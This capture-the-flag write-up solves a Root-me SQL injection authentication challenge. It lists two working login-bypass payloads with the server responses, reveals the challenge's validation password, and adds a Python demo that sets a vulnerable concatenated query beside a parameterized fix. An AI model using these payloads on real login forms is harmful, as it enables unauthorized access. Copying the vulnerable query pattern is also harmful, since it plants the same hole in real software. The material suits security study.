Rootme SQLi Authentication v0.01
Root-me.org
SQL Injection Authentication
Authentication v 0.01
In this challenge we need to retrieve the administrator password.
When we click on the challenge link, we’re brought to a login and password input box.
After trying the obvious ways to bypass authentication, I found a couple that worked.
One of the mistakes I made was to only try to bypass it using the password field.
So what I did was to use the username 'admin' and try to bypass the password field. This worked but gave us this:
The parameters we passed were:
login=admin&password='%20or%200%3d0%20--
The response:
<h2>Welcome back user1 !</h2><h3>Your informations :</h3>
<p>- username : <input type="text" value="user1" disabled /><br/>
- password : <input type="password" value="TYsgv75zgtq" disabled /></p><br />
We're logged in as "user1", and if we try the password TYsgv75zgtq it does not work.
So I decided to try to bypass the login parameter also. That also gave me the same response as the previous one.
We had to append our SQL injection after the username admin. The request looked like this:
login=admin'%20or%20''%3d'&password=test
And the response is:
<h2>Welcome back admin !</h2><h3>Your informations :</h3>
<p>- username : <input type="text" value="admin" disabled /><br/>-
password : <input type="password" value="t0_W34k!$" disabled />
</p><br />Hi master ! <b>To validate the challenge use this password</b>
There’s the password.
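Why the two requests land on different accounts, and how bound parameters stop both, as an added example that is not part of the original write-up. The query shape, the table layout and the stored passwords are assumptions made for illustration; the challenge's real back end is not shown on the page.

```python
import sqlite3

def make_db():
    # Constructed sample data; user1 is stored before admin, as the responses suggest.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("user1", "user1-secret"), ("admin", "admin-secret")])
    return db

def login_vulnerable(db, login, password):
    # Assumed query shape: both inputs are concatenated into the SQL text.
    sql = ("SELECT username FROM users "
           "WHERE username='%s' AND password='%s'" % (login, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, login, password):
    # Hardened form: inputs are bound as values and never parsed as SQL.
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (login, password)).fetchone()
    return row[0] if row else None

# The two requests from the write-up, URL-decoded.
PASSWORD_FIELD = ("admin", "' or 0=0 --")
LOGIN_FIELD = ("admin' or ''='", "test")

def demo():
    db = make_db()
    return {
        # AND binds tighter than OR:
        # (username='admin' AND password='') OR 0=0 -> every row matches,
        # so the application shows the first row, user1.
        "vuln_password_field": login_vulnerable(db, *PASSWORD_FIELD),
        # username='admin' OR (''='' AND password='test') -> only the admin
        # row matches, because the password test is false for every user.
        "vuln_login_field": login_vulnerable(db, *LOGIN_FIELD),
        # With bound parameters the same strings are compared literally.
        "safe_password_field": login_parameterized(db, *PASSWORD_FIELD),
        "safe_login_field": login_parameterized(db, *LOGIN_FIELD),
        "safe_real_login": login_parameterized(db, "admin", "admin-secret"),
    }

if __name__ == "__main__":
    for name, user in demo().items():
        print(name, "->", user)
```
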